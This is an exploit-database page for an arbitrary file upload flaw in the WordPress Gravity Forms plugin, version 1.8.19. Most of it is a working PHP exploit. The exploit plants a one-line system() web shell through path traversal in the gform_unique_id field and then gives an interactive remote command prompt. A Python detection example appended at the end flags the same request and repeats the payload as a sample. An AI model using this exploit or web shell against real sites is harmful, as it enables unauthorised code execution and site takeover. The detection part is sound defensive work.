WordPress Gravity Forms 1.8.19 Shell Upload

2016.06.18
Credit: Abk Khan
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

<?php
# Exploit Title: Wordpress Gravity Forms - Arbitrary File Upload
# Vendor Homepage: http://www.gravityforms.com/
# Vulnerable Version(s): 1.8.19 (and below)
# Exploit Author: Abk Khan
# Contact: [ an0nguy @ protonmail.ch ]
# Website: http://blog.lolwaleet.com/
# Category: webapps
# PS: I just wrote the exploit code by reading this write-up [ goo.gl/816np5 ] -- Don't know who found the vulnerability!

error_reporting(0);

$domain    = 'http://localhost/wordpress';
$url       = "$domain/?gf_page=upload";
$shell     = "$domain/wp-content/_input_3_khan.php5";
$separator = '-----------------------------------------------------';

# One POST to the unauthenticated Gravity Forms upload handler; the file name
# and gform_unique_id fields decide where the uploaded content is written.
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, '<?=system($_GET[0]);?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

# eregi() was removed in PHP 7; preg_match() with the /i flag is the same case-insensitive match.
if (preg_match('/ok/i', $response)) {
    echo "$separator\nShell at $shell\n$separator\n\n";
    $testCom = '';
    while ($testCom != 'bubye!') {
        $user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
        echo "$user@b0x:~$ ";
        $handle  = fopen("php://stdin", 'r');
        $testCom = trim(fgets($handle));
        fclose($handle);
        $comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
        echo $comOut;
    }
} else {
    die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
}

# Returns the substring between the first $start marker and the following $end marker.
function get_string_between($string, $start, $end) {
    # stolen from stackoverflow!
    $string = " " . $string;
    $ini = strpos($string, $start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}
?>
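Added detection example (not part of the advisory or the exploit above): a Python check that flags POSTs to the Gravity Forms upload handler carrying a traversal sequence in gform_unique_id, an executable upload name, or a PHP open tag in the body, run over constructed request records of the kind a WAF or reverse proxy would log. The names inspect, scan and SAMPLE_REQUESTS are this example's own; the field names are the ones the request on this page uses.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Extensions an upload handler on a WordPress host should never write.
EXEC_EXT = re.compile(r'\.(php\d?|phtml|phar|shtml)$', re.IGNORECASE)
# Assumption: a legitimate gform_unique_id is a plain alphanumeric token.
SAFE_UID = re.compile(r'^[A-Za-z0-9]+$')


def inspect(method, url, body):
    """Return the reasons this request looks like abuse of ?gf_page=upload.

    An empty list means nothing matched. Requests that do not target the
    upload handler are ignored so the check stays cheap on normal traffic.
    """
    reasons = []
    query = parse_qs(urlsplit(url).query)
    if query.get('gf_page') != ['upload'] or method.upper() != 'POST':
        return reasons
    fields = parse_qs(body, keep_blank_values=True)
    uid = fields.get('gform_unique_id', [''])[0]
    name = fields.get('name', [''])[0]
    if uid and not SAFE_UID.match(uid):
        reasons.append(f'path traversal in gform_unique_id: {uid!r}')
    if EXEC_EXT.search(name) or '/' in name or '\\' in name:
        reasons.append(f'executable or path-bearing upload name: {name!r}')
    if '<?' in body:
        reasons.append('PHP open tag in upload body')
    return reasons


# Constructed sample records (method, url, raw body), not real traffic.
SAMPLE_REQUESTS = [
    ('POST', 'http://localhost/wordpress/?gf_page=upload',
     '<?=system($_GET[0]);?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3'),
    ('POST', 'http://localhost/wordpress/?gf_page=upload',
     'form_id=1&name=resume.pdf&gform_unique_id=5f3a9c1e2b7d&field_id=3'),
    ('GET', 'http://localhost/wordpress/?p=12', ''),
]


def scan(records):
    """Map record index -> reasons for every record that triggers a rule."""
    hits = {}
    for i, record in enumerate(records):
        reasons = inspect(*record)
        if reasons:
            hits[i] = reasons
    return hits


if __name__ == '__main__':
    for i, reasons in scan(SAMPLE_REQUESTS).items():
        print(i, reasons)
```

Only the first constructed record trips the rules (all three of them); the benign upload and the unrelated GET pass clean.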


Copyright 2024, cxsecurity.com